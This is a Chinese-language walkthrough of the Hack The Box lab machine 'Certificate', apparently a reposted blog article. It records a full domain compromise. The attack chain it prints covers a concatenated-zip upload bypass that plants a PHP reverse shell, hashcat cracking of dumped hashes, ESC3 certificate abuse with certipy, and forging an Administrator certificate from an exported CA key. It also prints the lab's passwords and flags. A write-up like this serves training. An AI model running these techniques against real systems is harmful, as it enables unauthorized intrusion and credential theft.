信息收集
nmap
端口探测
➜ Certificate nmap --min-rate 10000 -A -p- 10.10.11.71Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-09 20:49 CSTNmap scan report for 10.10.11.71Host is up (0.30s latency).Not shown: 65519 filtered tcp ports (no-response)PORT STATE SERVICE VERSION53/tcp open domain (generic dns response: SERVFAIL)| fingerprint-strings: | DNSVersionBindReqTCP: | version|_ bind80/tcp open tcpwrapped|_http-title: Did not follow redirect to http://certificate.htb/|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.3088/tcp open tcpwrapped135/tcp open tcpwrapped139/tcp open tcpwrapped445/tcp open tcpwrapped593/tcp open tcpwrapped636/tcp open tcpwrapped| ssl-cert: Subject: commonName=DC01.certificate.htb| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb| Not valid before: 2024-11-04T03:14:54|_Not valid after: 2025-11-04T03:14:54|_ssl-date: 2025-06-09T20:29:06+00:00; +7h38m17s from scanner time.3268/tcp open tcpwrapped3269/tcp open tcpwrapped|_ssl-date: 2025-06-09T20:29:03+00:00; +7h38m18s from scanner time.| ssl-cert: Subject: commonName=DC01.certificate.htb| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb| Not valid before: 2024-11-04T03:14:54|_Not valid after: 2025-11-04T03:14:549389/tcp open tcpwrapped49667/tcp open tcpwrapped49692/tcp open tcpwrapped49693/tcp open tcpwrapped49712/tcp open tcpwrapped49718/tcp open tcpwrappeddirsearch
目录搜集
➜ Certificate dirsearch -u http://certificate.htb/ /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /home/yefeng/桌面/HTB/Certificate/reports/http_certificate.htb/__25-06-10_21-25-58.txtTarget: http://certificate.htb/[21:25:58] Starting: [21:26:02] 403 - 304B - /%C0%AE%C0%AE%C0%AF[21:26:02] 403 - 304B - /%3f/[21:26:02] 403 - 304B - /%ff[21:26:08] 403 - 304B - /.ht_wsr.txt[21:26:08] 403 - 304B - /.htaccess.bak1[21:26:08] 403 - 304B - /.htaccess.orig[21:26:08] 403 - 304B - /.htaccess.save[21:26:08] 403 - 304B - /.htaccess.sample[21:26:08] 403 - 304B - /.htaccess_sc[21:26:08] 403 - 304B - /.htaccess_orig[21:26:08] 403 - 304B - /.htaccessOLD[21:26:08] 403 - 304B - /.htaccess_extra[21:26:08] 403 - 304B - /.htaccessBAK[21:26:08] 403 - 304B - /.htaccessOLD2[21:26:08] 403 - 304B - /.htm[21:26:08] 403 - 304B - /.html[21:26:08] 403 - 304B - /.htpasswd_test[21:26:08] 403 - 304B - /.httr-oauth[21:26:08] 403 - 304B - /.htpasswds[21:26:24] 200 - 14KB - /about.php[21:26:49] 403 - 304B - /cgi-bin/[21:26:49] 500 - 638B - /cgi-bin/printenv.pl[21:26:56] 200 - 0B - /db.php[21:27:02] 503 - 404B - /examples[21:27:02] 503 - 404B - /examples/jsp/%252e%252e/%252e%252e/manager/html/[21:27:02] 503 - 404B - /examples/[21:27:02] 503 - 404B - /examples/servlets/servlet/CookieExample[21:27:02] 503 - 404B - /examples/jsp/snp/snoop.jsp[21:27:02] 503 - 404B - /examples/servlets/servlet/RequestHeaderExample[21:27:02] 503 - 404B - /examples/servlets/index.html[21:27:02] 503 - 404B - /examples/jsp/index.html[21:27:02] 503 - 404B - /examples/servlet/SnoopServlet[21:27:02] 503 - 404B - /examples/websocket/index.xhtml[21:27:04] 200 - 3KB - /footer.php[21:27:07] 200 - 2KB - /header.php[21:27:10] 403 - 304B - /index.php::$DATA[21:27:15] 200 - 9KB - /login.php[21:27:16] 302 - 0B - /logout.php -> login.php[21:27:28] 403 - 423B - /phpmyadmin[21:27:30] 403 - 423B - /phpmyadmin/[21:27:30] 403 - 423B - /phpmyadmin/docs/html/index.html[21:27:30] 403 - 423B - /phpmyadmin/ChangeLog[21:27:30] 403 - 423B - /phpmyadmin/phpmyadmin/index.php[21:27:30] 403 - 423B - /phpmyadmin/doc/html/index.html[21:27:30] 403 - 423B - /phpmyadmin/index.php[21:27:30] 403 - 423B - /phpmyadmin/README[21:27:30] 403 - 423B - /phpmyadmin/scripts/setup.php[21:27:35] 200 - 11KB - /register.php[21:27:37] 403 - 423B - /server-info[21:27:37] 403 - 423B - /server-status/[21:27:38] 403 - 423B - /server-status[21:27:42] 301 - 343B - /static -> http://certificate.htb/static/[21:27:42] 301 - 345B - /static.. -> http://certificate.htb/static../[21:27:50] 403 - 304B - /Trace.axd::$DATA[21:27:51] 302 - 0B - /upload.php -> login.php[21:27:56] 403 - 304B - /web.config::$DATA[21:27:56] 403 - 304B - /webalizer[21:27:56] 403 - 304B - /webalizer/有upload.php页面,但是无法直接访问。有注册和登录页面。
注册一个号,登录进去寻找功能点。
80端口 - upload
可以在底部看到使用的模板或者主题是Colorlib,可以尝试搜索且寻找CVE
注册登录进来,寻找功能点,在这里课程里面,可以看到这个Enroll功能,点击这个之后,下面会有Submit
点击Submit会跳转到http://certificate.htb/upload.php?s_id=5进行提交作业文件(上传)。
这里根据提示,只能上传
We accept only the following file types: .pdf .docx .pptx .xlsx You include the assignment file in .zip archive file to reduce it's size
尝试上传php文件,不成功
学习到了一个新东西
这不是压缩包,是陷阱:警惕 Evasive Concatenated Zip 攻击
https://github.com/snyk/zip-slip-vulnerability
https://perception-point.io/blog/evasive-concatenated-zip-trojan-targets-windows-users/
根据上面的链接,生成zip文件
➜ Certificate lsreports reverse test.pdf➜ Certificate ls -al reverse # reverse目录下存放 反弹shell的木马总计 12drwxrwxr-x 2 yefeng yefeng 4096 6月10日 22:39 .drwxrwxr-x 4 yefeng yefeng 4096 6月10日 22:40 ..-rw-rw-r-- 1 yefeng yefeng 2585 6月10日 22:38 reverse.php➜ Certificate zip test.zip test.pdf # 压缩一个无害的zip文件,里面随便放一个文件 adding: test.pdf (deflated 98%)➜ Certificate zip -r shell.zip reverse # 压缩那个存放木马的文件夹 adding: reverse/ (stored 0%) adding: reverse/reverse.php (deflated 60%)➜ Certificate cat test.zip shell.zip > final.zip # 将无害的zip和有害的zip 先后压缩在 最后的zip中➜ Certificate ls final.zip reports reverse shell.zip test.pdf test.zip上传final压缩包,上传成功,可以点击here
跳转到了这个路径,根据我们刚才压缩的进行访问,同时要进行监听
http://certificate.htb/static/uploads/7af21a959d787f761b08dac295577bdd/test.pdfhttp://certificate.htb/static/uploads/7af21a959d787f761b08dac295577bdd/reverse/reverse.php
shell -> Sara.b -> information
寻找信息,看到了db.php,在前面的dirsearch中也扫描到了该文件。进行查看,泄露了数据库账号密码
PS C:xampphtdocscertificate.htb> ls Directory: C:xampphtdocscertificate.htbMode LastWriteTime Length Name ---- ------------- ------ ---- d----- 12/26/2024 1:49 AM static -a---- 12/24/2024 12:45 AM 7179 about.php -a---- 12/30/2024 1:50 PM 17197 blog.php -a---- 12/30/2024 2:02 PM 6560 contacts.php -a---- 12/24/2024 6:10 AM 15381 course-details.php -a---- 12/24/2024 12:53 AM 4632 courses.php -a---- 12/23/2024 4:46 AM 549 db.php -a---- 12/22/2024 10:07 AM 1647 feature-area-2.php -a---- 12/22/2024 10:22 AM 1331 feature-area.php -a---- 12/22/2024 10:16 AM 2955 footer.php -a---- 12/23/2024 5:13 AM 2351 header.php -a---- 12/24/2024 12:52 AM 9497 index.php -a---- 12/25/2024 1:34 PM 5908 login.php -a---- 12/23/2024 5:14 AM 153 logout.php -a---- 12/24/2024 1:27 AM 5321 popular-courses-area.php -a---- 12/25/2024 1:27 PM 8240 register.php -a---- 12/28/2024 11:26 PM 10366 upload.php PS C:xampphtdocscertificate.htb> type db.php<?php// Database connection using PDOtry { $dsn = 'mysql:host=localhost;dbname=Certificate_WEBAPP_DB;charset=utf8mb4'; $db_user = 'certificate_webapp_user'; // Change to your DB username $db_passwd = 'cert!f!c@teDBPWD'; // Change to your DB password $options = [ PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION, PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC, ]; $pdo = new PDO($dsn, $db_user, $db_passwd, $options);} catch (PDOException $e) { die('Database connection failed: ' . $e->getMessage());}?>想办法连接,这个 xampp目录 -> 免费开源软件包,发现其中有mysql.exe
通过-e参数执行数据库查询命令,且结果返回在终端,-E以垂直显示,排版整齐。
PS C:xamppmysqlbin> .mysql.exe -u certificate_webapp_user -p"cert!f!c@teDBPWD" -e "use certificate_webapp_db; select * from users;" -E *************************** 1. row *************************** id: 1 first_name: Lorra last_name: Armessa username: Lorra.AAA email: [email protected] password: $2y$04$bZs2FUjVRiFswY84CUR8ve02ymuiy0QD23XOKFuT6IM2sBbgQvEFGcreated_at: 2024-12-23 12:43:10 role: teacher is_active: 1*************************** 2. row *************************** id: 6first_name: Sara last_name: Laracrof username: Sara1200 email: [email protected] password: $2y$04$pgTOAkSnYMQoILmL6MRXLOOfFlZUPR4lAD2kvWZj.i/dyvXNSqCkKcreated_at: 2024-12-23 12:47:11 role: teacher is_active: 1*************************** 3. row *************************** id: 7first_name: John last_name: Wood username: Johney email: [email protected] password: $2y$04$VaUEcSd6p5NnpgwnHyh8zey13zo/hL7jfQd9U.PGyEW3yqBf.IxRqcreated_at: 2024-12-23 13:18:18 role: student is_active: 1*************************** 4. row *************************** id: 8first_name: Havok last_name: Watterson username: havokww email: [email protected] password: $2y$04$XSXoFSfcMoS5Zp8ojTeUSOj6ENEun6oWM93mvRQgvaBufba5I5nticreated_at: 2024-12-24 09:08:04 role: teacher is_active: 1*************************** 5. row *************************** id: 9first_name: Steven last_name: Roman username: stev email: [email protected] password: $2y$04$6FHP.7xTHRGYRI9kRIo7deUHz0LX.vx2ixwv0cOW6TDtRGgOhRFX2created_at: 2024-12-24 12:05:05 role: student is_active: 1*************************** 6. row *************************** id: 10first_name: Sara last_name: Brawn username: sara.b email: [email protected] password: $2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6created_at: 2024-12-25 21:31:26 role: admin is_active: 1*************************** 7. row *************************** id: 12first_name: a last_name: a username: test email: [email protected] password: $2y$04$vwe.PPbSkbpE8PUUlTlXUu33rl7SNaDQrbZSomfpknEXtOgxeillycreated_at: 2025-06-12 13:16:01 role: student is_active: 1*************************** 8. row *************************** id: 13first_name: Kali last_name: Kalki username: Kali email: [email protected] password: $2y$04$hfaMKHRnCcSRI04qiWK1auFkdDFhMAaRlPDtH0WfgKZGouda5590Kcreated_at: 2025-06-12 13:18:13 role: student is_active: 1查看存在哪些用户
PS C:Users> ls Directory: C:UsersMode LastWriteTime Length Name ---- ------------- ------ ---- d----- 12/30/2024 8:33 PM Administrator d----- 11/23/2024 6:59 PM akeder.kh d----- 11/4/2024 12:55 AM Lion.SK d-r--- 11/3/2024 1:05 AM Public d----- 11/3/2024 7:26 PM Ryan.K d----- 11/26/2024 4:12 PM Sara.B d----- 12/29/2024 5:30 PM xamppuser 有一个Sara.B是存在数据库中的,尝试爆破
hashcat -> Sara.b
username: sara.b email: [email protected] password: $2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6➜ Certificate hashcat -m 3200 -a 0 hash /usr/share/wordlists/rockyou.txt --show$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6:Blink182# 可以通过cmb进行验证➜ Certificate crackmapexec winrm 10.10.11.71 -u sara.b -p 'Blink182' SMB 10.10.11.71 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:certificate.htb)HTTP 10.10.11.71 5985 DC01 [*] http://10.10.11.71:5985/wsman/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0. arc4 = algorithms.ARC4(self._key)WINRM 10.10.11.71 5985 DC01 [+] certificate.htbsara.b:Blink182 (Pwn3d!)Evil-winrm
evil-winrm进行连接
➜ Certificate evil-winrm -i dc01.certificate.htb -u sara.b -p 'Blink182'Evil-WinRM shell v3.7Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module RelineData: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completionInfo: Establishing connection to remote endpoint*Evil-WinRM* PS C:UsersSara.BDocuments> whoamicertificatesara.b连上之后,并没有user.txt,说明这个权限还不够,还需要继续移动,需要继续收集信息
pcap流量文件泄露
发现documents存在东西,里面有WS-01,后面有一个pcap流量文件
*Evil-WinRM* PS C:UsersSara.BDocuments> ls Directory: C:UsersSara.BDocumentsMode LastWriteTime Length Name---- ------------- ------ ----d----- 11/4/2024 12:53 AM WS-01*Evil-WinRM* PS C:UsersSara.BDocuments> cd WS-01*Evil-WinRM* PS C:UsersSara.BDocumentsWS-01> dir Directory: C:UsersSara.BDocumentsWS-01Mode LastWriteTime Length Name---- ------------- ------ -----a---- 11/4/2024 12:44 AM 530 Description.txt-a---- 11/4/2024 12:45 AM 296660 WS-01_PktMon.pcap*Evil-WinRM* PS C:UsersSara.BDocumentsWS-01> download WS-01_PktMon.pcap .Info: Downloading C:UsersSara.BDocumentsWS-01WS-01_PktMon.pcap to WS-01_PktMon.pcapInfo: Download successful!用wireshark打开,分析,都是些smb2,krb5协议的数据包,身份验证
通过这个项目进行组装哈希值
https://github.com/jalvarezz13/Krb5RoastParser
这里需要手动给域名加上.HTB后缀
➜ Krb5RoastParser git:(main) python krb5_roast_parser.py ../WS-01_PktMon.pcap as_req$krb5pa$18$Lion.SK$CERTIFICATE$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0$krb5pa$18$Lion.SK$CERTIFICATE.HTB$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0hashcat -> Lion.SK
➜ Certificate hashcat -m 19900 -a 0 hash1 /usr/share/wordlists/rockyou.txt --show$krb5pa$18$Lion.SK$CERTIFICATE.HTB$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0:!QAZ2wsxshell -> Lion.SK -> user.txt
➜ Certificate evil-winrm -i 10.10.11.71 -u 'Lion.SK' -p '!QAZ2wsx'Evil-WinRM shell v3.7Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module RelineData: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completionInfo: Establishing connection to remote endpoint*Evil-WinRM* PS C:UsersLion.SKDocuments> whoamicertificatelion.sk该用户就可以得到user.txt了,在桌面的位置。
MGQ5ZTU5ZmZmMTlkNWNhZWYwZjdmOGI3ZDRmMmVhZjU=BloodHound
通过bloodhound收集信息
➜ Certificate bloodhound-python -u Lion.SK -p '!QAZ2wsx' -d certificate.htb -ns 10.10.11.71 -c All --zip INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)INFO: Found AD domain: certificate.htbINFO: Getting TGT for userINFO: Connecting to LDAP server: dc01.certificate.htbINFO: Found 1 domainsINFO: Found 1 domains in the forestINFO: Found 3 computersINFO: Connecting to LDAP server: dc01.certificate.htbINFO: Found 19 usersINFO: Found 58 groupsINFO: Found 2 gposINFO: Found 1 ousINFO: Found 19 containersINFO: Found 0 trustsINFO: Starting computer enumeration with 10 workersINFO: Querying computer: WS-05.certificate.htbINFO: Querying computer: WS-01.certificate.htbINFO: Querying computer: DC01.certificate.htbERROR: Unhandled exception in computer DC01.certificate.htb processing: The NETBIOS connection with the remote host timed out.INFO: Traceback (most recent call last):.........................impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out.INFO: Done in 00M 51SINFO: Compressing output into 20250613080000_bloodhound.zip在bloodhound导入zip文件
Lion属于DOMAIN CRA MANAGERS组,该组是用来颁发和撤销证书的。
尝试certipy来操纵
certipy
➜ Certificate certipy find -u lion.sk -p '!QAZ2wsx' -dc-ip 10.10.11.71 Certipy v5.0.2 - by Oliver Lyak (ly4k)[*] Finding certificate templates[*] Found 35 certificate templates[*] Finding certificate authorities[*] Found 1 certificate authority[*] Found 12 enabled certificate templates[*] Finding issuance policies[*] Found 18 issuance policies[*] Found 0 OIDs linked to templates[*] Retrieving CA configuration for 'Certificate-LTD-CA' via RRP[*] Successfully retrieved CA configuration for 'Certificate-LTD-CA'[*] Checking web enrollment for CA 'Certificate-LTD-CA' @ 'DC01.certificate.htb'[!] Error checking web enrollment: timed out[!] Use -debug to print a stacktrace[*] Saving text output to '20250613081134_Certipy.txt'[*] Wrote text output to '20250613081134_Certipy.txt'[*] Saving JSON output to '20250613081134_Certipy.json'[*] Wrote JSON output to '20250613081134_Certipy.json'
ESC3攻击,但是这里失败了
Ryan.k用户属于DOMAIN STORAGE MANAGERS,可以针对这个用户进行ESC3攻击
# 请求基于 Delegated-CRA 模板的证书。获取一个中间证书。攻击者期望 Delegated-CRA 模板存在缺陷,使得 lion.sk 用户(可能权限不高)能够获得一个具有特殊能力(特别是作为“注册代理”的能力)的证书。certipy req -u '[email protected]' -p "!QAZ2wsx" -dc-ip '10.10.11.71' -target 'DC01.CERTIFICATE.HTB' -ca 'Certificate-LTD-CA' -template 'Delegated-CRA'# 利用 Delegated-CRA 证书,以 ryan.k 的名义请求 SignedUser 模板证书certipy req -u '[email protected]' -p "!QAZ2wsx" -dc-ip '10.10.11.71' -target 'DC01.CERTIFICATE.HTB' -ca 'Certificate-LTD-CA' -template 'SignedUser' -pfx 'lion.sk.pfx' -on-behalf-of 'CERTIFICATEryan.k'# 使用获取到的 ryan.k 证书进行认证certipy auth -pfx 'ryan.k.pfx' -dc-ip '10.10.11.71'➜ Certificate certipy req -u '[email protected]' -p "!QAZ2wsx" -dc-ip '10.10.11.71' -target 'DC01.CERTIFICATE.HTB' -ca 'Certificate-LTD-CA' -template 'Delegated-CRA'Certipy v5.0.2 - by Oliver Lyak (ly4k)[*] Requesting certificate via RPC[*] Request ID is 21[*] Successfully requested certificate[*] Got certificate with UPN '[email protected]'[*] Certificate object SID is 'S-1-5-21-515537669-4223687196-3249690583-1115'[*] Saving certificate and private key to 'lion.sk.pfx'[*] Wrote certificate and private key to 'lion.sk.pfx'➜ Certificate certipy req -u '[email protected]' -p "!QAZ2wsx" -dc-ip '10.10.11.71' -target 'DC01.CERTIFICATE.HTB' -ca 'Certificate-LTD-CA' -template 'SignedUser' -pfx 'lion.sk.pfx' -on-behalf-of 'CERTIFICATEryan.k'Certipy v5.0.2 - by Oliver Lyak (ly4k)[*] Requesting certificate via RPC[*] Request ID is 22[*] Successfully requested certificate[*] Got certificate with UPN '[email protected]'[*] Certificate object SID is 'S-1-5-21-515537669-4223687196-3249690583-1117'[*] Saving certificate and private key to 'ryan.k.pfx'[*] Wrote certificate and private key to 'ryan.k.pfx'➜ Certificate certipy auth -pfx 'ryan.k.pfx' -dc-ip '10.10.11.71'Certipy v5.0.2 - by Oliver Lyak (ly4k)[*] Certificate identities:[*] SAN UPN: '[email protected]'[*] Security Extension SID: 'S-1-5-21-515537669-4223687196-3249690583-1117'[*] Using principal: '[email protected]'[*] Trying to get TGT...[*] Got TGT[*] Saving credential cache to 'ryan.k.ccache'[*] Wrote credential cache to 'ryan.k.ccache'[*] Trying to retrieve NT hash for 'ryan.k'[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:b1bc3d70e70f4f36b1509a65ae1a2ae6shell -> Ryan.k
➜ Certificate evil-winrm -i 10.10.11.71 -u 'Ryan.k' -H 'b1bc3d70e70f4f36b1509a65ae1a2ae6'Evil-WinRM shell v3.7Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module RelineData: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completionInfo: Establishing connection to remote endpoint*Evil-WinRM* PS C:UsersRyan.KDocuments> whoamicertificateryan.k 查看一下当前用户的权限
*Evil-WinRM* PS C:UsersRyan.KDocuments> whoami /privPRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ================================ ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeManageVolumePrivilege Perform volume maintenance tasks Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled SeManageVolumePrivilege权限 ---> https://github.com/CsEnox/SeManageVolumeExploit
上传exe
*Evil-WinRM* PS C:UsersRyan.K> upload /home/yefeng/桌面/HTB/Certificate/SeManageVolumeExploit.exe .Info: Uploading /home/yefeng/桌面/HTB/Certificate/SeManageVolumeExploit.exe to C:UsersRyan.K.Data: 16384 bytes of 16384 bytes copiedInfo: Upload successful!*Evil-WinRM* PS C:UsersRyan.K> dir Directory: C:UsersRyan.KMode LastWriteTime Length Name---- ------------- ------ ----d-r--- 9/15/2018 12:12 AM Desktopd-r--- 6/12/2025 5:33 PM Documentsd-r--- 9/15/2018 12:12 AM Downloadsd-r--- 9/15/2018 12:12 AM Favoritesd-r--- 9/15/2018 12:12 AM Linksd-r--- 9/15/2018 12:12 AM Musicd-r--- 9/15/2018 12:12 AM Picturesd----- 9/15/2018 12:12 AM Saved Gamesd-r--- 9/15/2018 12:12 AM Videos-a---- 6/12/2025 5:35 PM 3422 SeManageVolumeExploit.c-a---- 6/12/2025 5:37 PM 12288 SeManageVolumeExploit.exe*Evil-WinRM* PS C:UsersRyan.K> 证书伪造
*Evil-WinRM* PS C:UsersRyan.KDocuments> certutil -Store MyMy "Personal"================ Certificate 0 ================Archived!Serial Number: 472cb6148184a9894f6d4d2587b1b165Issuer: CN=certificate-DC01-CA, DC=certificate, DC=htb NotBefore: 11/3/2024 3:30 PM NotAfter: 11/3/2029 3:40 PMSubject: CN=certificate-DC01-CA, DC=certificate, DC=htbCA Version: V0.0Signature matches Public KeyRoot Certificate: Subject matches IssuerCert Hash(sha1): 82ad1e0c20a332c8d6adac3e5ea243204b85d3a7 Key Container = certificate-DC01-CA Unique container name: 6f761f351ca79dc7b0ee6f07b40ae906_7989b711-2e3f-4107-9aae-fb8df2e3b958 Provider = Microsoft Software Key Storage ProviderSignature test passed================ Certificate 1 ================Serial Number: 5800000002ca70ea4e42f218a6000000000002Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb NotBefore: 11/3/2024 8:14 PM NotAfter: 11/3/2025 8:14 PMSubject: CN=DC01.certificate.htbCertificate Template Name (Certificate Type): DomainControllerNon-root CertificateTemplate: DomainController, Domain ControllerCert Hash(sha1): 779a97b1d8e492b5bafebc02338845ffdff76ad2 Key Container = 46f11b4056ad38609b08d1dea6880023_7989b711-2e3f-4107-9aae-fb8df2e3b958 Simple container name: te-DomainController-3ece1f1c-d299-4a4d-be95-efa688b7fee2 Provider = Microsoft RSA SChannel Cryptographic ProviderPrivate key is NOT exportableEncryption test passed================ Certificate 2 ================Serial Number: 75b2f4bbf31f108945147b466131bdcaIssuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb NotBefore: 11/3/2024 3:55 PM NotAfter: 11/3/2034 4:05 PMSubject: CN=Certificate-LTD-CA, DC=certificate, DC=htbCertificate Template Name (Certificate Type): CACA Version: V0.0Signature matches Public KeyRoot Certificate: Subject matches IssuerTemplate: CA, Root Certification AuthorityCert Hash(sha1): 2f02901dcff083ed3dbb6cb0a15bbfee6002b1a8 Key Container = Certificate-LTD-CA Unique container name: 26b68cbdfcd6f5e467996e3f3810f3ca_7989b711-2e3f-4107-9aae-fb8df2e3b958 Provider = Microsoft Software Key Storage ProviderSignature test passedCertUtil: -store command completed successfully.*Evil-WinRM* PS C:temp> certutil -exportPFX My 75b2f4bbf31f108945147b466131bdca cert.pfx# 然后# 下载cert.pfx到本地*Evil-WinRM* PS C:temp> download cert.pfx .certipy forge -ca-pfx cert.pfx -out golden_ticket.pfx -upn Administratorcertipy auth -pfx golden_ticket.pfx -dc-ip 10.10.11.71 -user Administrator -domain CERTIFICATE.HTB伪造
➜ Certificate certipy forge -ca-pfx cert.pfx -out golden_ticket.pfx -upn AdministratorCertipy v5.0.2 - by Oliver Lyak (ly4k)[*] Saving forged certificate and private key to 'golden_ticket.pfx'[*] Wrote forged certificate and private key to 'golden_ticket.pfx'➜ Certificate certipy auth -pfx golden_ticket.pfx -dc-ip 10.10.11.71 -user Administrator -domain CERTIFICATE.HTBCertipy v5.0.2 - by Oliver Lyak (ly4k)[*] Certificate identities:[*] SAN UPN: 'Administrator'[*] Using principal: '[email protected]'[*] Trying to get TGT...[*] Got TGT[*] Saving credential cache to 'administrator.ccache'[*] Wrote credential cache to 'administrator.ccache'[*] Trying to retrieve NT hash for 'administrator'[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:d804304519bf0143c14cbf1c024408c6Evil-winrm -> administrator
NWUzMDBjNzY1YjJiNTJjNWFhYWU3OTY2YmUxOTQyYWU=原文始发于微信公众号(夜风Sec):HTB - Certificate
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论